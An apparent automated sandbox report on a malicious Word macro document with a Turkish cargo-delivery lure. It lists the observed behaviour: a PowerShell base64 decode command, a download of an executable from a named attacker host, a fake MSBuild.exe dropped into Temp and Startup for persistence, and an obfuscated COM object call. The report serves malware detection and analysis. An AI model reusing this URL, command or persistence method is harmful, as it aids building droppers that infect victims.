|
4/5
|
Process
|
Creates process
|
-
|
|
-
Creates process "powershell.exe /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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".
|
|
-
Creates process "C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe".
|
|
-
Creates process "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
4/5
|
File System
|
Known malicious file
|
Trojan
|
|
-
File "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe" is a known malicious file.
|
|
4/5
|
Network
|
Downloads data
|
Downloader
|
|
-
URL "http://araskargo-online.host/familypictures/aras.exe".
|
|
3/5
|
Network
|
Performs DNS request
|
-
|
|
-
Resolves host name "araskargo-online.host".
|
|
3/5
|
PE
|
Executes dropped PE file
|
-
|
|
-
Executes dropped file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
3/5
|
YARA
|
YARA match
|
-
|
|
-
Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc"
|
|
-
Rule "VBA_Obfuscation_ObjectName" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc"
|
|
2/5
|
Network
|
Connects to HTTP server
|
-
|
|
-
URL "araskargo-online.host/familypictures/aras.exe".
|
|
2/5
|
PE
|
Drops PE file
|
Dropper
|
|
-
Drops file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
2/5
|
VBA Macro
|
Executes macro on specific worksheet event
|
-
|
|
-
Executes macro automatically on target "document" and event "open".
|
|
-
Executes macro on target "document" and event "close".
|
|
-
Executes macro on target "document" and event "new".
|
|
-
Executes macro on target "document" and event "sync".
|
|
-
Executes macro on target "document" and event "xmlafterinsert".
|
|
-
Executes macro on target "document" and event "xmlbeforedelete".
|
|
2/5
|
VBA Macro
|
Creates suspicious COM object
|
-
|
|
-
CreateObject(U0VFzrjFo("1%&e'*8", "fBFTjwwKL"))
|
|
1/5
|
Process
|
Creates system object
|
-
|
|
-
Creates mutex with name "Global\.net clr networking".
|
|
1/5
|
Static
|
Unparsable sections in file
|
-
|
|
-
Static analyzer was unable to completely parse the analyzed file: C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc.
|
|
1/5
|
Static
|
Contains suspicious meta data
|
-
|
|
-
Office document contains below-average content data.
|
|
1/5
|
VBA Macro
|
Contains Office macro
|
-
|
|
-
Office document contains a VBA macro.
|